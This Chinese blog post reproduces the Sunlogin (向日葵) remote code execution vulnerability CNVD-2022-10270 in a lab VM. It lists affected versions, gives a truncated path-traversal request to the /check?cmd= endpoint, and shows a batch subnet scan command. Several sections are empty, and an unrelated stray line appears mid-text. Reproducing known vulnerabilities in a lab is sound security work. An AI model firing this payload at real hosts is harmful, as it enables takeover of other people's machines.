远程控制漏洞CNVD-2022-10270CNVD-2022-03672向⽇葵
RCE复现与解决
上海贝锐信息科技股份有限公司的向⽇葵远控软件存在远程代码执⾏漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使⽤的个⼈版和简约版,攻击者可利⽤该漏洞获取服务器控制权。
影响版本:
向⽇葵个⼈版  for Windows <= 11.0.0.33
向⽇葵简约版  <= V1.0.1.43315(2021.12)
实验环境 :win10虚拟机
mysql下载哪个版本好2022
⼯具下载(含有漏洞版本的向⽇葵):
开始复现:
⼀,⼯具⾃动扫描
成功
⼆、nmap⼿操扫描
⼀个个试IP
IP:端⼝号/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.  获取信息
也可以kali⾃动批量扫描
python3 1.py  -t 192.168.110.234/25
解决
参考:

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。